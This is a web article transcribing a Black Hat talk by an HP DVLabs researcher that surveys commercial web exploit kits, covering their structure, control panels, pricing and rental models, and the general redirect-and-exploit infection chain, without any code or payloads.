Quantcast

The State of Web Exploit Toolkits – Turnkey Cybercrime Software

Jason Jones During his Black Hat briefing, Jason Jones, the Team Lead for ASI at HP DVLabs, presents a professional extensive analysis of the present-day web exploit kits.

I’m going to be talking about the state of web exploit toolkits, which is a lot of what I’ve been doing on my job. I’m the Lead for Advanced Security Intelligence Team at HP DVLabs. A lot of what my job is – is to deal with malware, analyze it, try to figure out ways to determine reputation. We do a lot of malicious content harvesting. And web exploit toolkits are becoming more popular, more prevalent in the wild – it’s something that popped up on my radar and became a very interesting topic for me to continue researching.

What are web exploit kits?

What are web exploit kits?

If you’re not familiar with them, web exploit toolkits are pre-packaged software that generally consists of installer; a lot of them are PHP-based and they have database backend, it’s normally MySQL. They include a large number of exploits, and most of these exploits actually target known vulnerabilities that are already patched and are rarely 0-day. There is one instance of a 0-day vulnerability being in these things.

Another interesting and important thing is we can actually get some of these PHP files in raw form, but they are actually using the ionCube PHP Encoder which encrypts a PHP file so that it’s difficult to recover. There are services out there that claim to be able to decrypt this encoding but we never found any that actually really work.

A lot of these also have fancy control panels where you can go through and they’ll show statistics that will be about what countries your visitors are coming from, what browsers they are using, what exploits have been launched and successful. So, you can get quite a bit of information from that. And then also you can configure which exploits you want to use and which payloads you actually want to also launch. So, it ends up being very similar to a normal web application. Where they differ is their whole goal is to install a malicious payload, some piece of malware. They have been used a lot to build up botnets, Trojans, fake AV, ransomware type of stuff. At the end of the day, it’s just a way for any cyber criminal to easily build something up and make money.

Characteristics of web exploits toolkits

Characteristics of web exploits toolkits

A lot of these kits can cost thousands of dollars; some of them are free but some of them are very expensive. You can also do rentals: daily, weekly, monthly type of stuff. And they actually do a similar model of maybe a day costing $100, but for a week it costs $500; so they’ll offer you a discount to try to get you to go up. They also do bullet-proof hosting, which is hosting on their hosting servers where you are not going to get taken down because it’s hosted by cyber criminals, so they are not going to obey law enforcement’s request to remove it.

And a lot of times they’ll contain agreements like EULAs stating that you have permission to do this with their kit, you cannot resell it, you cannot disclose what’s in it – it’s like what you expect to see with normal software. And that’s where it becomes really interesting because the economy is built up like a legitimate software business, but in the underground. It gets really interesting because there’s also marketing and competitiveness between kits, where one kit will say: “We’re better than this kit because we have exploits A, B and C”, and the other kit will say: “Well, they stole those from us”. So it’s just like the whole back and forth between these guys.

The other way that they mimic normal software is they do a lot of bug fixes; they do reliability updates for exploits if people complain; and they also do aesthetic changes when a new version comes out, like “Oh, we added a new spinner into our control panel; we made the statistics look nicer”. So it ends up being very interesting just from that perspective of there being a feedback loop between them and customers.

A listing of active web exploit toolkits, according to Kahu Security

A listing of active web exploit toolkits, according to Kahu Security

This (see left-hand graphic) is an image that I borrowed from Kahu Security’s blog who talks a lot about these things and who’s definitely been someone who – if I’m kind of stuck on something and I’m trying to find something new, trying to verify a trend – he is one of the guys who has definitely been of big help. So, he’s talking about a lot of the active kits that are out there. I’m going to talk about BlackHole a lot, also Phoenix; and you also see some of the older kits like Eleonore or Bleedinglife; you also see RedKit which I don’t cover but actually I believe it has some bytecode obfuscation that’s Java exploits, so it’s just some other interesting features that are coming around in these kits.

How it works

How it works

So, the typical way these kits work (see right-hand image) is – you see here the red exploit kit server – they’ll normally try to go out and find a vulnerable website; they’ll attempt to compromise it and inject malicious JavaScript that ends up redirecting any potential visitor to their site, to this other site; and then they’ll do the typical browser detection, see if they have an exploit for what browser version you are running; so, if you’re running a plugin that they have exploits for, then they’ll attempt to exploit you. Then they’ll end up loading their malware. You can also go to the control panel on this kit and actually see a list of everyone who you’ve compromised and you can also manage them from there.
 

Read next: The State of Web Exploit Toolkits 2: BlackHole Kit Scrutinized

Like This Article? Let Others Know!
Related Articles:

Leave a comment:

Your email address will not be published. Required fields are marked *

Comment via Facebook: